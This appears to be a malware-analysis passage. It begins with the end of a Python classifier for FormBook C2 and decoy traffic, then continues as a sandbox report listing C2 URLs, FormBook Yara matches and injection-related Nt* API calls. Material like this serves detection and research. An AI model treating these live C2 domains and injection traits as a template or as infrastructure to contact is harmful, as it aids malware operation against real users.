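    bare = _strip_www(host)
    c2 = {_strip_www(u) for u in config["C2 list"]}
    decoys = {_strip_www(d) for d in config["decoy"]}
    if bare + url.path in c2:
        verdict = "configured_c2"
    elif bare in decoys:
        verdict = "decoy_from_config"
    else:
        verdict = "unlisted"
    return {"host": host, "path": url.path, "verdict": verdict,
            "blob_param": k1, "id_param": k2}


def run(requests=REQUESTS):
    return [classify(r) for r in requests]


if __name__ == "__main__":
    for raw, result in zip(REQUESTS, run()):
        print(raw.split("\r\n", 1)[0][:40], "->", result)
```

An "unlisted" verdict on a request that passes the shape check is the interesting case in production: it means a domain that is not in the extracted config, i.e. either a different build of the same family or a config your extractor missed.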
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.architeizer.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.architeizer.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.architeizer.com/riai/www.happinessmail.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.architeizer.comReferer:
Source: explorer.exe, 00000003.00000000.355167796.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.controlservicesreport.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.controlservicesreport.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.controlservicesreport.com/riai/www.architeizer.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.controlservicesreport.comReferer:
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.dehaochu.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.dehaochu.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.dehaochu.com/riai/www.goproteinz.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.dehaochu.comReferer:
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.dingolope.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.dingolope.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.dingolope.com/riai/www.pinupcasino-start.site
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.dingolope.comReferer:
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.elevictory.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.elevictory.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.elevictory.com/riai/www.skipbinsplus.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.elevictory.comReferer:
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.gammacake.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.gammacake.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.gammacake.com/riai/www.dehaochu.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.gammacake.comReferer:
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.goproteinz.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.goproteinz.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.goproteinz.com/riai/www.thewellbeingsutra.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.goproteinz.comReferer:
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.happinessmail.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.happinessmail.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.happinessmail.com/riai/www.jumlasx.xyz
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.happinessmail.comReferer:
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.jumlasx.xyz
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.jumlasx.xyz/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.jumlasx.xyzReferer:
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.learningfitbit.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.learningfitbit.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.learningfitbit.com/riai/www.upperish.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.learningfitbit.comReferer:
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.pinupcasino-start.site
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.pinupcasino-start.site/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.pinupcasino-start.site/riai/www.learningfitbit.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.pinupcasino-start.siteReferer:
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.skipbinsplus.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.skipbinsplus.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.skipbinsplus.com/riai/www.controlservicesreport.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.skipbinsplus.comReferer:
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.stuntmemorabilia.net
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.stuntmemorabilia.net/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.stuntmemorabilia.net/riai/www.yourbesttacolife.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.stuntmemorabilia.netReferer:
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.thewellbeingsutra.com
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.thewellbeingsutra.com/riai/
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.thewellbeingsutra.com/riai/www.stuntmemorabilia.net
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.thewellbeingsutra.comReferer:
Source: explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmp | String found in binary or memory: http://www.upperish.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.com/riai/www.elevictory.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.upperish.comReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.com/riai/
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.com/riai/www.dingolope.com
          Source: explorer.exe, 00000003.00000002.612339636.00000000063F6000.00000004.00000001.sdmpString found in binary or memory: http://www.yourbesttacolife.comReferer:
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.363739206.0000000006B92000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.376999694.000000000B1A0000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.352221052.0000000002911000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: NEW ORDER ELO-05756485.exeString found in binary or memory: https://www.gnu.org
          Source: NEW ORDER ELO-05756485.exeString found in binary or memory: https://www.gnu.org/licenses/
          Source: NEW ORDER ELO-05756485.exe, 00000000.00000002.351832870.0000000000B88000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match; File source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match; File source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.392063770.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.353489494.00000000039D3000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.392670755.0000000000D10000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.392967604.0000000000E60000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.598954001.0000000002B60000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.598682434.0000000002540000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.NEW ORDER ELO-05756485.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious name
          Source: initial sample; Static PE information: Filename: NEW ORDER ELO-05756485.exe
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 0_2_07380AA8 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 0_2_07380AA2 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_0041A060 NtClose
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_0041A110 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_00419F30 NtCreateFile
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_00419FE0 NtReadFile
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_0041A05A NtClose
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_00419F2B NtCreateFile
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_013599A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_013598F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_013595D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_013597A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_013596E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359950 NtQueueApcThread
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_013599D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359820 NtEnumerateKey
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_0135B040 NtSuspendThread
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_013598A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359B00 NtSetValueKey
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_0135A3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359A10 NtQuerySection
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_0135AD30 NtSetContextThread
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359560 NtWriteFile
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_013595F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_0135A710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_0135A770 NtOpenThread
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359770 NtSetInformationFile
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359760 NtOpenProcess
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_01359650 NtQueryValueKey
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exe: Code function: 2_2_013596D0 NtCreateKey
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_045695D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_045696D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_045696E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_045699A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569560 NtWriteFile
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_0456AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_045695F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_0456A770 NtOpenThread
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569760 NtOpenProcess
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_0456A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_045697A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_0456B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_04569820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_045698F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\colorcpl.exe: Code function: 8_2_045698A0 NtWriteVirtualMemory
